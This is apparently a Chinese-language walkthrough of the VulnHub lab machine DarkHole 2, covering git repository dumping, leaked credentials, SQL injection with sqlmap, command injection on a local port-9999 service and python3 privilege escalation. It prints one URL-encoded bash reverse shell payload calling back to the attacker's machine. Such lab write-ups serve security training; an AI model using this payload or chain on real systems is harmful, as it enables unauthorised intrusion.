前期準備：

靶機地址：https://www.vulnhub.com/entry/darkhole-2,740/

kali攻擊機ip：192.168.11.129
靶機ip：192.168.11.188

一、資訊收集

1.使用nmap對目標靶機進行掃描

發現開放了22和80埠，而且還有 Git repository。

2. 80埠

因為 80 埠有 git 倉庫，那就把倉庫轉過來看看，使用 git-dumper（從網站轉儲 git 儲存庫的工具。）

下載 git_dumper.py ，並賦權：

把目標靶機中的 git 倉庫弄下來：

東西不少，找 log 看看：

是個登入介面：

需要郵箱和密碼，看下快取區：

發現了郵箱和密碼，"[email protected]" - "321"。登陸一下：

二、漏洞利用

發現可能是個注入點，sqlmap 爆一下，記得這裡要加上 cookie：

發現了資料庫，看一下 darkhole_2 庫中的表：

看一下表中的資料：

發現了 ssh 登入的使用者名稱和密碼，登入ssh：

發現一個 flag，檢視定時任務時發現有服務在 9999 埠上：

檢視一下 /opt/web：

A線在執行 cmd ，看下 tcp 程序：

發現在監聽狀態，試一下：

發現可以用，在cmd處寫入shell，記得要 url 編碼：

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.129%2F1234%200%3E%261%27

查看了一番後，在家目錄下的 .bash_history 檔案中發現了 losy 的密碼：

三、提權

ssh 切換成 losy 使用者，檢視一下許可權：

發現 python3 隨便用，那就簡單了，直接用 python3 提權：

得到 flag。